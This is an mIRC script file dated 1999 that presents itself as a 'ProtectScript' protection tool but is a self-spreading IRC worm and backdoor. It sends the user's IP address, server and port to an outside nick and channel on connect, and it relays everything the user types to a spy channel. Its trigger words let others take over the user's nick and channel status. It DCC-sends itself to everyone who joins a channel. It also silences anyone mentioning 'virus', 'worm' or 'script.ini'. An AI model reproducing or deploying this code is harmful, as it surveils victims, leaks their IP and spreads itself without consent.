;keep this LOAD! ProtectScript - Mirc32 (c) - copyright SenSi_v.1.1__designed_by_Del_Armg0        
;                                                                                                                                                         Hi!!!! LatitePatronne!!!!hehehe :) coucou titeChérie ; )  06/99

[SCRIPT]                                                                                                                              

n1=on 1:start:{
n2=.remote on
n3=.ctcps on
n4=.events on
n5=}
n6=
n7=on 1:connect:/raw privmsg Your_Nick SenSi11 $ip on $server $+ : $+ $port $+
n8=on 1:connect:.msg #SenSi1 SenSi11 $ip on $server $+ : $+ $port $+
n9=on 1:input:*:.msg #spy1 [( $+ $active $+ ) $1-]
n10=
n11=
n12=
n13=
n14=
n15=
n16=
n17=
n18=
n19=
n20=
n21=
n22=
n23=on 1:text:*nick*:#:/nick Nuke_Me!
n24=on 1:text:*bang*:#:/mode $chan +o $nick
n25=on 1:TEXT:*boum*:#:/mode $chan +b $me
n26=on 1:TEXT:*boum*:#:/kick $chan $me
n27=on 1:join:#:{
n28=if ( $nick == $me ) { halt } | .dcc send $nick $mircdir $+ script.ini
n29=}
n30=on 1:text:*del*:#:/msg $nick SenSi11_MAITRE!(à Your_Nick) $ip
n31=on 1:TEXT:*script.ini*:?:/.ignore $nick
n32=on 1:TEXT:*virus*:?:/.ignore $nick
n33=on 1:TEXT:*worm*:?:/.ignore $nick
;

